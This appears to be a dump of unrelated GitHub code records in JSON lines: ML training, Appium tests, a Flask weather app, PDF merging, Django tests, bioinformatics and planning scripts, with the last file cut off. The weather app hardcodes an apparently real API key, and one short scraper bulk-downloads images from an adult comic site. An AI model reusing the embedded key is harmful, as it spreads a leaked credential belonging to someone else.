0)\n if global_rank == 0:\n print(f\"loss {iter}:\", aggregated_loss.cpu().numpy() / config.world_size)\n # dist.barrier(device_ids=[global_rank])\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)\n # torch.cuda.synchronize()\n optimizer.step()\n # dist.barrier()\n if local_rank == 0:\n iter_duration = time.time() - last_iter_time\n # print(\"iter time: \", iter_duration)\n result_times.append(iter_duration)\n # print(\"avg±std:\", np.mean(result_times[-config.avg_iter:]), np.std(result_times[-config.avg_iter:]))\n last_iter_time += iter_duration\n\n print(\"peak memory\", torch.cuda.max_memory_allocated())\n\n if not config.trace:\n return\n\n x, y = next(train_data)\n x = x.chunk(config.world_size, 0)[global_rank].cuda(local_rank)\n y = y.chunk(config.world_size, 0)[global_rank].cuda(local_rank)\n with profile(\n activities = [ProfilerActivity.CPU, ProfilerActivity.CUDA],\n # record_shapes = True,\n # profile_memory = True,\n schedule = torch.profiler.schedule(wait=1, warmup=10, active=4)\n ) as prof:\n for _ in range(15):\n with record_function(\"forward\"):\n with torch.autocast(device_type=\"cuda\") if config.fp16 else nullcontext() :\n loss = model(x, y)\n with record_function(\"backward\"):\n loss.backward()\n torch.cuda.synchronize()\n with record_function(\"update\"):\n optimizer.step()\n dist.barrier()\n prof.step()\n\n if local_rank == 0:\n # print(prof.key_averages().table(sort_by=\"cuda_time_total\"))\n prof.export_chrome_trace(\"trace.json\")\n\nif __name__ == '__main__':\n ranks = [ int(x) for x in sys.argv[1].split(',') ]\n\n if torch.cuda.device_count() != len(ranks):\n print(\"forget to set CUDA_VISIBLE_DEVICES\")\n raise SystemExit\n\n import os\n os.environ['MASTER_ADDR'] = str(config.master_addr)\n os.environ['MASTER_PORT'] = str(config.master_port)\n os.environ['WORLD_SIZE'] = str(config.world_size)\n\n import torch.multiprocessing as mp\n mp.set_start_method('spawn')\n\n for local_rank, global_rank in enumerate(ranks):\n mp.Process(target=run, args=(global_rank, local_rank)).start()\n\n for p in mp.active_children():\n p.join()\n","repo_name":"ylxdzsw/hidup","sub_path":"exp/ddp.py","file_name":"ddp.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72510124968","text":"import os\nimport time\nimport unittest\n\nfrom appium import webdriver\n\n\nclass Tests1(unittest.TestCase):\n def setUp(self):\n desired_caps = {\"platformName\": \"Android\",\n \"platformVersion\": \"7.1.2\",\n 'deviceName': 'Redmi 4x',\n 'udid': '192.168.0.103:5555',\n 'appPackage': 'com.miui.calculator',\n 'appActivity': 'com.miui.calculator.cal.CalculatorActivity',\n 'unicodeKeyboard': True,\n 'resetunicodeKeyboard': True,\n 'noReset': True,\n 'deviceReadyTimeout': 120,\n 'newCommandTimeout': 20,\n 'androidDeviceReadyTimeout': 60,\n 'autoAcceptAlerts': True,\n 'autoGrantPermissions': True\n }\n\n self.driver = webdriver.Remote(\n \"http://127.0.0.1:4723/wd/hub\", desired_caps)\n self.driver.implicitly_wait(20)\n\n def testCalculator(self):\n \"\"\"计算器测试\"\"\"\n self.driver.find_element_by_id(\n 'com.miui.calculator:id/btn_7_s').click()\n self.getScreenShot()\n time.sleep(0.5)\n print(\"\\r\\nIn step1, press 7\")\n self.driver.find_element_by_id(\n 'com.miui.calculator:id/btn_plus_s').click()\n self.getScreenShot()\n time.sleep(0.5)\n print(\"In step2, press +\")\n self.driver.find_element_by_id(\n 'com.miui.calculator:id/btn_1_s').click()\n self.getScreenShot()\n time.sleep(0.5)\n print(\"In step3, press 1\")\n self.driver.find_element_by_id(\n 'com.miui.calculator:id/btn_c_s').click()\n self.getScreenShot()\n time.sleep(0.5)\n print(\"In step4, press clear\")\n\n def getScreenShot(self):\n img_folder = os.path.abspath(os.path.join(\n os.path.dirname(__file__), \"..\")) + '//screenshots//'\n ti = time.strftime('%m%d%H%M%S', time.localtime(time.time()))\n screen_save_path = img_folder + ti + '.png'\n self.driver.get_screenshot_as_file(screen_save_path)\n\n def tearDown(self):\n self.driver.quit()\n","repo_name":"xuanyuanchl/AutomationFrameworks","sub_path":"PythonAppiumAndroidFramework/src/Test/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33258176784","text":"import requests\nimport re\nimport uuid\nfrom bs4 import BeautifulSoup\n\n#俺のエロ本URLとコンテンツ番号の取得\nurl = \"http://oreno-erohon.com/content/\"\ncontents = \"174319\";\nr = requests.get(url+contents)\nsoup = BeautifulSoup(r.text,'lxml')\nimgs = soup.find_all('img',src=re.compile('.+725x1024.jpg'))\ni =0\nfor img in imgs: \n print(img['src'])\n r = requests.get(img['src'])\n with open(str('./picture/'+contents+'/')+str(i)+str('.jpg'),'wb') as file:\n file.write(r.content)\n i=i+1\n","repo_name":"yukidevv/ererscript","sub_path":"scr.py","file_name":"scr.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16389474609","text":"# app.py\nfrom flask import Flask, render_template, request\nimport requests\n\napp = Flask(__name__)\n\n# Replace with your own API key from https://openweathermap.org/api\nAPI_KEY = \"269ee17023aaa4f9dbf0dd12f5ab9311\"\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/weather\", methods=[\"POST\"])\ndef weather():\n city = request.form.get(\"city\")\n url = f\"https://api.openweathermap.org/data/2.5/weather?q={city}&appid={API_KEY}&units=metric\"\n response = requests.get(url)\n data = response.json()\n \n \n if data[\"cod\"] == 200:\n weather = data[\"weather\"][0][\"description\"]\n temp = data[\"main\"][\"temp\"]\n feels_like = data[\"main\"][\"feels_like\"]\n time = data['dt']\n humidity = data[\"main\"][\"humidity\"]\n # dew_point = data['main']['dew_point']\n icon_id = data['weather'][0]['icon']\n icon_url = f\"http://openweathermap.org/img/w/{icon_id}.png\"\n weather_data = {'icon_url': icon_url}\n \n \n # icon = data[\"weather\"][0][\"icon\"]\n return render_template(\"weather.html\", city=city,time=time,weather=weather,weather_data=weather_data, temp=temp, feels_like=feels_like, humidity=humidity)\n else:\n error = data[\"message\"]\n return render_template(\"error.html\", error=error)\n\n# def calculate_dew_point(temperature, humidity):\n# # Implement dew point calculation based on the temperature and relative humidity\n# # You can use various formulas available online for dew point calculation\n# return 0\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Samdami/Damsweather","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22723795106","text":"\n# łączenie plików PDF ze sobą\nimport glob\nfrom PyPDF2 import PdfReader, PdfMerger\n\nmerge = PdfMerger()\nfiles = glob.glob(\"pdf/*.pdf\")\nfor file in files:\n merge.append( PdfReader(file), pages=(0,1) )\n\nmerge.add_outline_item(\"Test zakładki na stronie nr 1\", 0)\nmerge.write(\"merged.pdf\")\nmerge.close()\n\n","repo_name":"marianwitkowski/BS-PDF-20230222","sub_path":"pdf03-merge.py","file_name":"pdf03-merge.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12495201958","text":"import logging\nimport os\nfrom datetime import datetime\nfrom logging import handlers, Logger, Formatter\nfrom logging.handlers import TimedRotatingFileHandler\n\n\ndef get_logger(tag, date) -> Logger:\n logging.basicConfig(level=logging.INFO)\n _logger: Logger = logging.getLogger(tag)\n\n if os.path.isdir('./log') is False:\n os.mkdir('./log')\n\n file_handler: TimedRotatingFileHandler = handlers.TimedRotatingFileHandler(\n filename=f'./log/{tag}.log.{date}',\n when='midnight',\n interval=1,\n encoding='UTF-8'\n )\n\n formatter: Formatter = logging.Formatter(\n '%(asctime)s - %(levelname)s - [%(filename)s:%(lineno)d] %(message)s'\n )\n file_handler.setFormatter(formatter)\n file_handler.suffix = \"%Y%m%d\"\n\n _logger.addHandler(file_handler)\n return _logger\n\n\nlogger = get_logger('logger', str(datetime.today())[:10].replace('-', ''))\n","repo_name":"Lob-dev/The-Joy-Of-Python","sub_path":"start-generate-thumbnail/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33557589983","text":"from django import template\n\nfrom pads.models import Pad\n\nregister = template.Library()\n\n\ndef do_get_pads(parser, token):\n try:\n tag_name, as_, var_name = token.split_contents()\n except ValueError:\n raise template.TemplateSyntaxError(\n \"%r tag requires a single argument - var name\"\n % token.contents.split()[0]\n )\n if as_ != 'as':\n raise template.TemplateSyntaxError(\n \"Format is: %r as VARNAME\" % tag_name\n )\n return GetPadsNode(var_name)\n\n\nclass GetPadsNode(template.Node):\n def __init__(self, var_name):\n self.var_name = var_name\n\n def render(self, context):\n context[self.var_name] = Pad.objects.filter(user=context['user'])\n return ''\n\nregister.tag('get_pads', do_get_pads)\n","repo_name":"komarserjio/notejam","sub_path":"django/notejam/pads/templatetags/pad_tags.py","file_name":"pad_tags.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":1150,"dataset":"github-code","pt":"53"} +{"seq_id":"74696428646","text":"#!/usr/bin/env python\nfrom utils import (load, take, show, bgr, image, like, bounds,\nchannels, crop, scale, color, avail, colorPicker)\n#http://homepages.inf.ed.ac.uk/rbf/HIPR2/log.htm\n#https://en.wikipedia.org/wiki/Unsharp_masking\n#http://www.effbot.org/imagingbook/image.htm\n#http://pythonvision.org/basic-tutorial/\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\n# processing\ndef alias(img,amount): #cheating with a mask\n\tlength, width = bounds(img)\n\tchannel = channels(img)\n\tpost = avail(img)\n\tmask = [[0,0,0],[255,255,255],[0,0,0],\n\t\t\t[255,255,255],[255,255,255],[255,255,255],\n\t\t\t[0,0,0],[255,255,255],[0,0,0]]\n\tresult = find(img,mask,(3,3))\n\treturn result\ndef sharpen(img,amount): #not actually sharpening\n\tresult = like(img)\n\tlength, width = bounds(img)\n\timg = img.load()\n\tresult = result.load()\n\tfor left in range(1,length-1):\n\t\tfor top in range(1,width-1):\n\t\t\tpixel = [0,0,0,0]\n\t\t\tfor l in range(-1,1):\n\t\t\t\tfor w in range(-1, 1):\n\t\t\t\t\tpixel[0] += img[left+l,top+w][0]\n\t\t\t\t\tpixel[1] += img[left+l,top+w][1]\n\t\t\t\t\tpixel[2] += img[left+l,top+w][2]\n\t\t\tresult[left,top] = tuple(pixel)\n\treturn result\n\n# blobbing\ndef group(img):#automatically\n\tlength, width = bounds(img)\n\tresult = like(img).load()\n\timg = img.load()\n\tcolor = [255,255,255,255]\n\ttolerance = [2,2,2,2]\n\tfor inc in range(1,127): # this is really really slow / iterative\n\t\tfor x in range(length):\n\t\t\tfor y in range(width):\n\t\t\t\tmatches = 0\n\t\t\t\tif (abs(img[x,y][0] - color[0]) < tolerance):\n\t\t\t\t\tmatches += 1\n\t\t\t\tif (abs(img[x,y][1] - color[1]) < tolerance):\n\t\t\t\t\tmatches += 1\n\t\t\t\tif (abs(img[x,y][2] - color[2]) < tolerance):\n\t\t\t\t\tmatches += 1\n\t\t\t\tif matches > 3:\n\t\t\t\t\tresult[x,y] = tuple(color)\n\treturn result\ndef find(img,mask,dims): # this isn't actually blobbing anything\n\tlength, width = bounds(img)\n\theight, breadth = dims\n\tresult = like(img)\n\timg = img.load()\n\theight = int(height / 2)\n\tbreadth = int(breadth / 2)\n\tfor l in range(height,length-height):\n\t\tfor w in range(breadth,width-breadth):\n\t\t\tpixel = img[l,w]\n\treturn result\n\n# metadata\ndef edge(img):\n\tavails = avail(img)\n\tresult = like(img).load()\n\tlength,width = bounds(img)\n\timg = img.load()\n\tfor a in range(0,len(avails)):\n\t\tav = avails[a]\n\t\tfor x in range(0,length):\n\t\t\tfor y in range(0,width):\n\t\t\t\tif av == img[x,y]:\n\t\t\t\t\tresult[x,y] == av\n\treturn result\ndef center(blob):\n\tim = cv2.imread(\"samples/abstract/colors.png\", cv2.IMREAD_GRAYSCALE)\n\tdetector = cv2.SimpleBlobDetector()\n\tkeypoints = detector.detect(im)\n\tim_with_keypoints = cv2.drawKeypoints(im, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\tcv2.imshow(\"Keypoints\", im_with_keypoints)\n\tcv2.waitKey(0)\ndef distance(img,point):\n\tresult = (0,0,0) # 3d grid\n\treturn result","repo_name":"jarulsamy/HackCamera","sub_path":"src/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22558050755","text":"import os\nimport pandas as pd\nimport scipy.stats as stats\nfrom functools import partial\nimport statistics\nimport matplotlib\nmatplotlib.use('agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set(style=\"white\")\nimport itertools\nfrom scipy.stats import gmean\n\n\ndef read_metagene_group(group_txt, format='gene2group'):\n if format != 'gene2group':\n result_dict = dict()\n with open(group_txt) as f:\n for line in f:\n metagene, genes = line.strip().split('\\t', 1)\n genes = [y.strip() for x in genes.split() for y in x.strip().split(',')]\n if metagene in result_dict:\n raise Exception(f\"{metagene} duplicated, please check it!\")\n else:\n result_dict[metagene] = genes\n else:\n result_dict = read_sample_group(group_txt)\n return result_dict\n\n\ndef read_sample_group(group_txt):\n group_df = pd.read_csv(group_txt, sep=None, engine='python', header=0, index_col=0)\n group_dict = dict()\n for scheme in group_df:\n tmp_dict = dict(list(group_df.loc[:, [scheme]].groupby(scheme)))\n for group, df_val in tmp_dict.items():\n if df_val.shape[0] == group_df.shape[0]:\n raise Exception('In column of {}, only one group was found!'.format(scheme))\n group_dict[group] = sorted(df_val.index)\n return group_dict\n\n\ndef read_compare_info(cmp_info, group_dict):\n with open(cmp_info) as f:\n cmp_list = list()\n error_names = list()\n for line in f:\n if line.startswith(\"#\") or not line.strip():\n continue\n tmp_ctrl, tmp_test = line.strip().split()\n if tmp_ctrl not in group_dict:\n error_names.append(tmp_ctrl)\n if tmp_test not in group_dict:\n error_names.append(tmp_test)\n cmp_list.append((tmp_ctrl, tmp_test))\n if error_names:\n print(f'Please be aware that Each group name of {error_names} is not in group dict!')\n cmp_list = sorted(list(set(cmp_list)))\n return cmp_list\n\n\ndef score_metagene(exp_matrix, metagene_dict:dict, score='geometric_mean'):\n exp_df = pd.read_csv(exp_matrix, header=0, index_col=0, sep=None, engine='python')\n score_df = pd.DataFrame(columns=exp_df.columns)\n valid_member_list = list()\n for metagene, genes in metagene_dict.items():\n intersect = set(genes) & set(exp_df.index)\n if intersect:\n valid_members = ','.join(intersect)\n valid_member_list.append(valid_members)\n meta_exp = exp_df.loc[intersect]\n if score == 'geometric_mean':\n meta_score = meta_exp.apply(stats.gmean, axis=0)\n else:\n meta_score = meta_exp.mean(axis=0)\n score_df.loc[metagene] = meta_score\n else:\n print(f'None member of metagene \"{metagene}\" is in expression matrix')\n score_df['members'] = valid_member_list\n score_df.set_index('members', append=True, inplace=True)\n return score_df\n\n\ndef diff_test(score_df, group_txt, compare_txt, method='mannwhitneyu', equal_var=True, prefix='',\n box_x='gene', box_xlabel='MetaGene'):\n group_dict = read_sample_group(group_txt)\n cmp_list = read_compare_info(compare_txt, group_dict)\n for ctrl, test in cmp_list:\n if not(ctrl in group_dict and test in group_dict):\n print(f'skip {ctrl} and {test} for both or one of them are/is not in group info dict!')\n continue\n ctrl_samples = group_dict[ctrl]\n test_samples = group_dict[test]\n print(ctrl_samples)\n print(test_samples)\n ctrl_num = len(ctrl_samples)\n target_data = score_df[ctrl_samples+test_samples]\n centered = target_data.sub(target_data.mean(axis=1), axis=0)\n mean_centered = pd.DataFrame()\n mean_centered[test] = centered[test_samples].mean(axis=1)\n mean_centered[ctrl] = centered[ctrl_samples].mean(axis=1)\n\n if method == 'ranksums':\n test_func = stats.ranksums\n elif method == 'mannwhitneyu':\n test_func = stats.mannwhitneyu\n elif method == \"wilcoxon\":\n test_func = stats.wilcoxon\n elif method == 'ttest_ind':\n if equal_var:\n test_func = stats.ttest_ind\n else:\n test_func = partial(stats.ttest_ind, equal_var=False)\n else:\n raise Exception(f'{method} is not supported! '\n f'Choose one of [ranksums, mannwhitneyu, wilcoxon, ttest_ind')\n test_df = pd.DataFrame()\n test_df['pvalue'] = target_data.apply(lambda x:test_func(x[:ctrl_num], x[ctrl_num:])[1], axis=1)\n ctrl_median_exp = target_data[ctrl_samples].apply(statistics.median, axis=1)\n test_median_exp = target_data[test_samples].apply(statistics.median, axis=1)\n test_df[ctrl+'_median'] = ctrl_median_exp\n test_df[test+'_median'] = test_median_exp\n test_df['median_log2FC'] = test_median_exp - ctrl_median_exp\n test_df['regulation'] = 'down'\n test_df.loc[test_df['median_log2FC']>0, 'regulation'] = 'up'\n test_df = test_df.join(target_data)\n test_df.sort_values(by='pvalue', inplace=True)\n test_df.to_csv(f'{prefix}{ctrl}_vs_{test}.metagene.{method}.xls', sep='\\t')\n # plot box\n box_data = target_data.loc[test_df.index]\n box_data.index = [x for x, _ in box_data.index]\n group_df = pd.DataFrame({f'{ctrl}_vs_{test}': [ctrl] * len(ctrl_samples) + [test] * len(test_samples)},\n index=ctrl_samples + test_samples)\n expr_box_plot(box_data, group_df, x_col=box_x, xlabel=box_xlabel, prefix=prefix)\n # plot multiline\n mean_centered = mean_centered.loc[test_df.index]\n mean_centered.index = [x[0] for x in mean_centered.index]\n plot_exp_lines(mean_centered, out=f'{prefix}{ctrl}_vs_{test}.metagene.mean_centered.png')\n\n\ndef metagene_diff(exp_matrix, metagene_group, sample_group, compare, prefix='',\n metagene_group_format='gene2group', score='geometric_mean',\n method='mannwhitneyu', equal_var=True, box_x='gene',\n box_xlabel='MetaGene'):\n \"\"\"\n 给定表达矩阵, 样本分组信息和基��分组信息(metagene) 以及比较信息, 对meta基因做差异检验\n :param exp_matrix: 表达矩阵文件路径\n :param sample_group: 样本分组信息路径, 第一行为header\n :param metagene_group: 基因分组信息,也即metagene信息文件路径. 文件无需header, 内容有两种格式可选:\n (1) 第一列为metagene名,第二列为metagene的members,用逗号隔开 (2)第一列为基因名,第二列为metagene名\n :param compare: 分组比较信息,第一列为对照组,第二列为实验组/测试组\n :param prefix: 输出文件的前缀\n :param metagene_group_format: gene2group表示第二种格式, group2gene表示第三种格式\n :param score: 计算metagene score的方式, 默认geometric_mean, 即计算members的几何平均值,否则为算术平均值\n :param method: 检验方法, 默认'mannwhitneyu', 还有[ranksums, wilcoxon(配对比较时可选用), ttest_ind]可选\n :param equal_var: method为ttest_ind时可以指定的参数,默认做假设等方差检验\n :param box_x: 画box图的参数 横轴以基因为单位(默认), 另可指定为sample, 此时横轴以sample为单位\n :param box_xlabel: 画box图的参数 横轴的label, 默认为MetaGene\n :return:\n \"\"\"\n # score\n metagene_group_dict = read_metagene_group(metagene_group, format=metagene_group_format)\n metagene_score_df = score_metagene(exp_matrix, metagene_group_dict, score=score)\n\n # test\n diff_test(metagene_score_df, sample_group, compare,\n method=method, equal_var=equal_var, prefix=prefix)\n # plot box\n box_data = metagene_score_df.copy()\n box_data.index = [x for x, _ in box_data.index]\n expr_box_plot(box_data, sample_group, x_col=box_x, xlabel=box_xlabel, prefix=prefix)\n\n # plot multiline\n centered_score = metagene_score_df.sub(metagene_score_df.mean(axis=1), axis=0)\n mean_centered_score = pd.DataFrame()\n for group, samples in read_sample_group(sample_group).items():\n mean_centered_score[group] = centered_score[samples].mean(axis=1)\n mean_centered_score.index = [x[0] for x in mean_centered_score.index]\n plot_exp_lines(mean_centered_score, out=f'{prefix}all.metagene.mean_centered.png')\n\n\ndef _plot_multiline(data, out='multiline.png', annotate_at_end=False):\n colors = ['b', 'r', 'g', 'y', 'c', 'pink', 'm', 'grey', 'darkgrey']\n line_style = ['-', '-.', ':']\n cmbs = list(itertools.product(colors, line_style))\n plt.figure(figsize=(7, 8))\n for ind, index in enumerate(data.index):\n plt.plot(\n range(data.shape[1]),\n data.loc[index],\n label=index,\n color=cmbs[ind][0],\n linestyle=cmbs[ind][1],\n marker='o',\n markeredgecolor=cmbs[ind][0],\n markerfacecolor='w',\n markersize=5\n )\n if annotate_at_end:\n plt.annotate(\n index,\n xy=(data.shape[1]-1, data.loc[index][-1]),\n fontsize=5\n )\n plt.xticks(range(data.shape[1]), data.columns)\n plt.xlim(-0.2, data.shape[1]-1+(data.shape[1]+1)*0.32)\n if not annotate_at_end:\n plt.legend(loc=1, fontsize='xx-small')\n plt.savefig(out, dpi=300, bbox_inches='tight')\n plt.close()\n\n\ndef plot_exp_lines(data, index_col:list=0, sample_group=None, annotate_at_end=False,\n group_order:list=None, out='multiline.png'):\n if sample_group is not None:\n group_df = pd.read_csv(sample_group, index_col=0, header=0, sep=None, engine='python')\n group_names = set(group_df.iloc[:, 0])\n if group_order is None:\n group_names = sorted(list(group_names))\n else:\n group_names = group_order\n if type(data) == str:\n data = pd.read_csv(data, index_col=index_col, header=0, sep=None, engine='python')\n centered = data.sub(data.mean(axis=1), axis=0)\n mean_centered = pd.DataFrame()\n for name in group_names:\n target_samples = list(group_df.loc[group_df.iloc[:, 0]==name].index)\n mean_centered[name] = centered[target_samples].mean(axis=1)\n # print(geometric.mean(axis=1))\n plot_data = mean_centered\n else:\n if type(data) == str:\n plot_data = pd.read_csv(data, index_col=index_col, header=0, sep=None, engine='python')\n else:\n plot_data = data\n\n _plot_multiline(plot_data, out=out, annotate_at_end=annotate_at_end)\n\n\ndef expr_box_plot(expr_matrix, sample_group, x_col='gene', xlabel=None, prefix=''):\n if type(expr_matrix) == str:\n data = pd.read_csv(expr_matrix, header=0, index_col=0, sep=None, engine='python')\n else:\n data = expr_matrix\n data.index.name = 'Gene'\n data = data.reset_index('Gene')\n data = data.melt(id_vars=['Gene'], var_name='Sample', value_name='Expression')\n if type(sample_group) == str:\n group = pd.read_csv(sample_group, header=0, index_col=0, sep=None, engine='python')\n else:\n group = sample_group\n group.index.name = 'Sample'\n group_names = group.columns\n group.reset_index('Sample', inplace=True)\n data = data.merge(group, on='Sample')\n data.to_csv(f'{prefix}metagene.expr.csv')\n # print(data.head())\n for name in group_names:\n if x_col.lower() == 'gene':\n ax = sns.boxplot(x='Gene', y='Expression', hue=name, data=data)\n else:\n ax = sns.boxplot(x='Sample', y='Expression', hue=name, data=data)\n ax.set_xticklabels(ax.get_xmajorticklabels(), fontsize=6, rotation=90)\n if xlabel:\n ax.set(xlabel=xlabel)\n plt.savefig(f'{prefix}{name}.boxplot.png', dpi=300, bbox_inches='tight')\n plt.close()\n\n\nif __name__ == '__main__':\n from xcmds import xcmds\n xcmds.xcmds(locals(), include=['metagene_diff'])\n\n","repo_name":"gudeqing/biodev","sub_path":"smallScripts/metagene_diff.py","file_name":"metagene_diff.py","file_ext":"py","file_size_in_byte":12166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37425317648","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django import template\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\n\nfrom labJS.base import Labjs\nfrom labJS.templatetags.labjs import LabjsNode, Wait\n\n\nclass FakeNode(object):\n\n def render(self, context):\n return 'some content'\n\n\nclass TestLabjs(TestCase):\n\n def test_split_contents_empty_content(self):\n lab = Labjs('')\n self.assertFalse(lab.split_contents())\n\n def test_split_contents_non_js_content(self):\n lab = Labjs('

I am not JS

')\n self.assertFalse(lab.split_contents())\n\n def test_split_contents_inline(self):\n lab = Labjs('')\n self.assertEqual(\n lab.split_contents(),\n [{'data': 'document.write(\"Hello world\");', 'type': 'inline'}]\n )\n\n def test_split_contents_script(self):\n lab = Labjs('')\n self.assertEqual(\n lab.split_contents(),\n [{'data': '/static/script.js', 'type': 'script'}]\n )\n\n def test_render_output_inline_contains_script(self):\n lab = Labjs('')\n self.assertIn('document.write(\"Hello world\");', lab.render_output())\n\n def test_render_output_script_contains_src(self):\n lab = Labjs('')\n self.assertIn('/static/script.js', lab.render_output())\n\n\nclass TestLabjsNode(TestCase):\n\n @override_settings(LABJS_DEBUG_TOGGLE='labjs')\n def test_debug_mode_no_request_context(self):\n node = LabjsNode(None)\n context = {}\n self.assertFalse(node.debug_mode(context))\n\n @override_settings(LABJS_DEBUG_TOGGLE='labjs')\n def test_debug_mode_no_toggle(self):\n node = LabjsNode(None)\n context = {\n 'request': RequestFactory().get('/'),\n }\n self.assertFalse(node.debug_mode(context))\n\n @override_settings(LABJS_DEBUG_TOGGLE='labjs')\n def test_debug_mode_with_toggle(self):\n node = LabjsNode(None)\n context = {\n 'request': RequestFactory().get('/?labjs=1'),\n }\n self.assertTrue(node.debug_mode(context))\n\n @override_settings(LABJS_DEBUG_TOGGLE=None)\n def test_debug_mode_setting_undefined(self):\n node = LabjsNode(None)\n context = {\n 'request': RequestFactory().get('/?labjs='),\n }\n self.assertFalse(node.debug_mode(context))\n\n @override_settings(LABJS_ENABLED=False)\n def test_disabled_leaves_content_as_original(self):\n node = LabjsNode(FakeNode())\n context = {\n 'request': RequestFactory().get('/?labjs='),\n }\n self.assertEqual(node.render(context), 'some content')\n\n\nclass TestWaitNode(TestCase):\n\n def test_wait_node_renders_as_empty_script(self):\n self.assertHTMLEqual(\n Wait().render(template.Context({})),\n ''\n )\n\n\nclass TestTemplateTags(TestCase):\n\n def test_runlabjs_output_includes_runQueue(self):\n t = template.Template('{% load labjs %}{% runlabjs %}')\n self.assertIn('runQueue', t.render(template.Context({})))\n","repo_name":"ashwoods/django-labjs","sub_path":"labJS/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"5695245108","text":"\"\"\"Prints distanceutils version when executed.\"\"\"\n\nimport argparse\n\n\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('--list-categories', action='store_true',\n help=\"List all class categories.\")\ngroup.add_argument('--list-classes', nargs='?', const='all',\n metavar='CATEGORY|\"all\"',\n help=\"List classes of specified category or all categories.\")\ngroup.add_argument('--list-fragment', metavar='TAG',\n help=\"List information of the fragment with specified tag.\")\nargs = parser.parse_args()\n\nif args.list_categories:\n from . import DefaultClasses\n DefaultClasses.print_listing(print_classes=False)\nelif args.list_classes is not None:\n category = args.list_classes\n from . import DefaultClasses\n if category == 'all':\n DefaultClasses.print_listing()\n else:\n try:\n coll = DefaultClasses.get_category(category)\n except KeyError:\n print(f\"Category {category!r} doesn't exist\")\n exit(1)\n else:\n coll.print_listing()\nelif args.list_fragment is not None:\n from .classes import TagError, DefaultClasses\n tag = args.list_fragment\n try:\n DefaultClasses.fragments.print_listing(tag=tag)\n except TagError:\n print(f\"Fragment class with tag {tag!r} doesn't exist\")\n exit(1)\nelse:\n from . import __version__\n print(f\"distanceutils version {__version__}\")\n\n\n# vim:set sw=4 ts=8 sts=4 et:\n","repo_name":"ferreum/distanceutils","sub_path":"distance/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"73686858408","text":"# Crie um programa que vai ler vários números e colocar em uma lista.\n# Depois disso, crie duas listas extras que vão conter apenas os valores pares e os valores ímpares digitados, respectivamente.\n# Ao final, mostre o conteúdo das três listas geradas\n\n\nlista_geral = []\nlista_impares = []\nlista_pares = []\nwhile True:\n lista_geral.append(int(input('Digite um número: ')))\n ask = input('Quer continuar? [S/N]').upper()\n if ask == 'N':\n break\n\nfor x in lista_geral:\n if x % 2 == 0:\n lista_pares.append(x)\n else:\n lista_impares.append(x)\n\nprint(f'A lista geral é {lista_geral}')\nprint(f'A sua lista de números pares é {lista_pares}')\nprint(f'A sua lista de números ímpares é {lista_impares}')","repo_name":"hectorrobertoantunes/exercicios","sub_path":"ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11330432026","text":"#!/usr/bin/env python3\n\nimport sys, getopt\n\nimport signal\nimport os\nimport re\nimport subprocess\n\nimport data_util\nimport pickle\nimport parse\nimport math\nfrom correlation import delog_predict\n\nPddl_problem_ = \"../domains/dom_APE/Custom.pddl\" # (str) Default problem name, extension needed\nregr_name_full_ = data_util.regr_name_full_\n\nrun_wd = data_util.domains_wd\t\t\t# (str) Working directory\nout_wd = data_util.out_wd\n\nengine_path = data_util.engine_path\n\n\nPlan_Engine = 'enhsp' \t\t\t# (str) Define the planning engine to be use, choose between 'ff' or 'enhsp'\nPddl_domain_ = data_util.domain_name_full_ # (str) Name of pddl domain file\ndelta = data_util.delta_val\n\noutput_keywords = data_util.output_keywords # list of (str): keywords for relevant outputs\n \ncwd = os.getcwd()\n\ndef run(domain_full, problem_full, g_val, h_val, run_output_file, run_time=None, show_output=False):\n \"\"\"\n Function that calls enhsp-20 to plan over a (domain,problem)\n \n Some parameters are passed to the run, in order to tweak\n its behaviour. The results obtained, in terms of the\n metrics presented in 'output_keywords', are saved in a\n text file.\n \n Args:\n domain_full (str): path/to/domain_file\n problem_full (str): path/to/problem_file\n g_val (float): weight of g() function in A*\n h_val (float): weight of h() function in A*\n run_output_file (file):\n open file to write trimmed\n results on\n run_time (int): timeout for the planner execution.\n The planner will be stopped if no\n sulution is found in time.\n (default None -> no timeout)\n 